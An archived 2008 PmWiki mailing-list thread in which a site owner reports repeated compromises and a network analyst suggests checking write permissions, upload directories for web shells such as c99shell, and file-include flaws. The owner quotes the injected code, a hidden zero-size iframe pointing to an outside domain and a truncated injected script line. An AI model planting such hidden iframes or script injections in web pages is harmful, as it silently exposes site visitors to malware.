[pmwiki-users] More hacking
erik.haa at gmail.com
Wed Sep 3 09:49:07 CDT 2008
- Configuration file is set to allow upload of gif, jpeg, jpg, png,
htm and html files. I've had a look in the upload directories - and
for the moment I could not find anything suspicious.
- Include markup is not used.
The pmWiki.php-file is infected with this line:
$HTMLEndFmt = "\n<script
I don't know how this works, but it seems to write this at the end of
many html and asp files at the site.
2008/9/3 Greg T. Grimes <greg.grimes at msstate.edu>:
> Are these files writeable by the web server? Do you allow uploads to your
> site? Standard security practice says not to allow the web server write
> access to any files on your system. This is especially true for your
> webpages. If you do allow uploads you might want to check your upload
> directory for files that could be used to gain access to your server.
> c99shell is an example. Another thing to look for are file include
> vulnerabilities. For example, if you take input for a form and then use
> that input to include a certain file based on the input this can be used to
> launch scripts that aren't even hosted on your server. I'm currently not
> aware of any File Include Vulns in pmwiki. Just a quick look at the code
> and I don't see any obvious ones.
> On Wed, 3 Sep 2008, Erik Haagensen wrote:
>> Our site has been hacked several times during the last month.
>> It has been cleaned and checked by Site Analyzer - all ok.
>> After some days we have problems again.
>> The index.php (and several other files) contains this now:
>> <?php include('pmwiki.php');
>> <iframe src="http://mixlong.cn/in/" width=0 height=0
>> I don't know what more to do to avoid these problems.
>> Erik Haagensen
>> NO-2550 Os i Østerdalen
> Greg T. Grimes
> Network Analyst
> ITS -- Network Services
> Mississippi State University
NO-2550 Os i Østerdalen
tlf: +47 62497332 / 94430332
More information about the pmwiki-users